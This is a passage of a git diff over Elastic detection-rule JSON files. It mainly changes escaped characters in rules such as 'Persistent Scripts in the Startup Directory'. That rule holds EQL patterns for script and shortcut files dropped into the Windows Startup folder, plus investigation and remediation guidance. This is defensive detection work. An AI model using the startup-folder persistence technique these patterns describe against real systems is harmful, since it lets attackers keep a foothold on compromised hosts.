Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and user.domain != \"NT AUTHORITY\" and\n\n /* detect shortcuts created by wscript.exe or cscript.exe */\n (file.path : \"C:\\\\*\\\\Programs\\\\Startup\\\\*.lnk\" and\n process.name : (\"wscript.exe\", \"cscript.exe\")) or\n\n /* detect vbs or js files created by any process */\n file.path : (\"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbs\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbe\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsh\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsf\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.js\")\n", "related_integrations": [ { @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "f7c4dc5a-a58d-491d-9f14-9b66507121c0", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_108.json b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_108.json index 886aa61c1fb..7195043619d 100644 --- a/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_108.json +++ b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_108.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistent Scripts in the Startup Directory", - "note": "## Triage and analysis\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and user.domain != \"NT AUTHORITY\" and\n\n /* detect shortcuts created by wscript.exe or cscript.exe */\n (file.path : \"C:\\\\*\\\\Programs\\\\Startup\\\\*.lnk\" and\n process.name : (\"wscript.exe\", \"cscript.exe\")) or\n\n /* detect vbs or js files created by any process */\n file.path : (\"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbs\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbe\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsh\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsf\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.js\")\n", "related_integrations": [ { @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "f7c4dc5a-a58d-491d-9f14-9b66507121c0", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_109.json b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_109.json index 89a39d9938a..7f3178efcc3 100644 --- a/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_109.json +++ b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_109.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistent Scripts in the Startup Directory", - "note": "## Triage and analysis\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and user.domain != \"NT AUTHORITY\" and\n\n /* detect shortcuts created by wscript.exe or cscript.exe */\n (file.path : \"C:\\\\*\\\\Programs\\\\Startup\\\\*.lnk\" and\n process.name : (\"wscript.exe\", \"cscript.exe\")) or\n\n /* detect vbs or js files created by any process */\n file.path : (\"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbs\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbe\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsh\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsf\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.js\")\n", "related_integrations": [ { @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "f7c4dc5a-a58d-491d-9f14-9b66507121c0", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_102.json b/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_102.json index 69a03f6ebc6..753233e8c07 100644 --- a/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_102.json +++ b/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_102.json @@ -65,7 +65,7 @@ ], "risk_score": 73, "rule_id": "f81ee52c-297e-46d9-9205-07e66931df26", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_103.json b/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_103.json index fe6eb541e54..3ac7c53e25e 100644 --- a/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_103.json +++ b/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_103.json @@ -65,7 +65,7 @@ ], "risk_score": 73, "rule_id": "f81ee52c-297e-46d9-9205-07e66931df26", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f81ee52c-297e-46d9-9205-07e66931df26_104.json 